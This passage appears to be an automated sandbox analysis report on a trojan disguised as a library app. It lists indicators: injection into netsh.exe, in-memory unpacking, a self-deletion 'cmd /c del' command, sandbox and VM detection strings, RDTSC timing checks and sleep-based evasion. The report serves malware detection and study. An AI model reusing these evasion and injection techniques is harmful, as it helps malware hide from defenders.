          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8690 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8710 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD870C NtReadFile,NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85DA NtCreateFile,
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.358021001.0000000003BDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000000.342497076.0000000000950000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.359712250.0000000005B10000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.360053021.00000000060A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000001.00000000.351201212.0000000000360000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000000.354123685.00000000005D0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434893300.0000000002FCC000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434541337.000000000126F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exeBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile read: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe:Zone.IdentifierJump to behavior
          Source: cK1g5gckZR9VHjj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@7/4
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: O/IVectorVi;component/views/addbook.xamle/IVectorVi;component/views/borrowfrombookview.xaml[/IVectorVi;component/views/borrowingview.xamlU/IVectorVi;component/views/changebook.xaml]/IVectorVi;component/views/changecustomer.xamlY/IVectorVi;component/views/customerview.xaml]/IVectorVi;component/views/deletecustomer.xamlS/IVectorVi;component/views/errorview.xamlW/IVectorVi;component/views/smallextras.xamlW/IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: cK1g5gckZR9VHjj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: cK1g5gckZR9VHjj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: cK1g5gckZR9VHjj.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E92F5 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E9347 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E9361 push ds; retf
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_053856E0 push esp; iretd
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F9361 push ds; retf
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F9347 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F92F5 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004153E6 push ss; iretd
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041541E push ss; iretd
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_005692F5 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00569347 push ds; ret
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00569361 push ds; retf
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0103D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0381D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD53E6 push ss; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB88C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB82B push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB822 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB7D5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD541E push ss; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85526570093

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.cK1g5gckZR9VHjj.exe.2c38e9c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.cK1g5gckZR9VHjj.exe.2ccaf94.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cK1g5gckZR9VHjj.exe PID: 7160, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DC8604 second address: 0000000002DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DC899E second address: 0000000002DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556Thread sleep count: 1934 > 30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239875s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556Thread sleep count: 1406 > 30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 7164Thread sleep time: -36459s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239747s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239639s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239530s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239422s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239296s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239187s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -239047s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238919s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238796s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238672s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238562s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238452s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -238157s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237500s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237359s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237246s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237139s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -237031s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236844s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236344s >= -30000s
